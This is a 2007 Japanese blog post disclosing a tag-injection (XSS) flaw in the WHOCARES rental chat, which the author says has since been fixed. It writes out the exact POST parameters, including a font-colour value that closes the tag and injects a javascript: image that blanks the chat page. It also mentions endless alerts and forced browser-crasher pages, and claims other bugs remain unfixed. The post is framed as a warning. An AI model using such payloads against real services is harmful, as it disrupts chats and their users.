|
| WHOCARESのレンタルチャットにて強制タグONの危険性【危険性大】 |
|
※2007/02/27、このバグは私の熱烈なアプローチにより修正されましたことをここに明記致します。 該当記事:中級者ハッキング講座すぺさる しかし、まだ追記に書かれている「追記:また、文字サイズのパーセンテージを設定されていない値にしても使用できるようです。10000%とかにしたら十分な効力を発揮します。」のバグは修正されていません。 また、ほかにも修正のこしのバグがあり、その所為で未だjavascriptが使えます。あしからず。 フーケアーズのレンタルチャットにて、強制的にタグが作動されるようになるバグを発見しました。 ふーけあーずはセキュリティが高いと認識していたのですが、少し考えを改めなくてはいけません。 ここ、雪傘にてリンクしているサイト様にも使っていられる方が多く、非常に心配です。 朱き月の鎮魂歌さん、情報革命伝説さん、この記事に気づいて><; さて 本題に入ります。 今回はTEACHATにて強制タグONの危険性のときと違い、UAは使用しません。 ここからは少し難しい話になりますので、理解できない方、とりあえず超危険なんだなということだけは覚えていてください。 まず、対象のチャットに入室するクエリを送信します。ここまでは普通です。特に何もしません。 次に、発言時ですが、ここが重要です。 opr=4&rn=ルームID&spchid=0&bold=0&italic=0&spch=発言内容&su=%E7%99%BA%E8%A8%80&fc=カラーコード&fs=100%25&rt=10&vfsz=10&sc=1&targ= これが本来の姿なんですが、ここを少しいじります。 opr=4&rn=ルームID&spchid=0&bold=0&italic=0&spch=発言内容&su=%E7%99%BA%E8%A8%80&fc=;">&fs=100%25&rt=10&vfsz=10&sc=1&targ= ;">をいれることによって、本来サーバ側で処理されるはずのフォントカラー指定タグを閉じさせます。 そしてそのあとに作動させたいタグを;">の後に書きます。 例 opr=4&rn=ルームID&spchid=0&bold=0&italic=0&spch=発言内容&su=%E7%99%BA%E8%A8%80&fc=;"><img src="javascript:document.all.tags('body')(0).innerHTML='The Chat Killer'">&fs=100%25&rt=10&vfsz=10&sc=1&targ= これをポストすると、ログ、参加者、閲覧がみえなくなります。 他にも、↑の緑の部分をいじるだけで、無限アラートを出すタグもはれますし、指定したブラクラサイトを開き続けさせることもできます。 追記:また、文字サイズのパーセンテージを設定されていない値にしても使用できるようです。10000%とかにしたら十分な効力を発揮します。  ↑マーキー&テーブルタグの図 ※悪用は厳禁です。 この記事は注意を促すために書かれました。 WHOCARES運営様、修正ありがとうございます。 関連記事:TEACHATにて強制タグONの危険性 新型CGIBOYチャット砲『cgiboy friend(お試し版)』 修正のこしのバグについてはこちら→中級者ハッキング講座すぺさる →チャットサイト雪傘へ |
| この記事に対するコメント |
|
なんという初歩的なバグwwwwwww
【2007/08/13 20:41】
URL | 通販さん@賛成です #- [ 編集]
|
| この記事に対するコメントの投稿 |
| この記事に対するトラックバック |
| トラックバックURL
→http://nnus.blog39.fc2.com/tb.php/201-5908c008 この記事にトラックバックする(FC2ブログユーザー) |
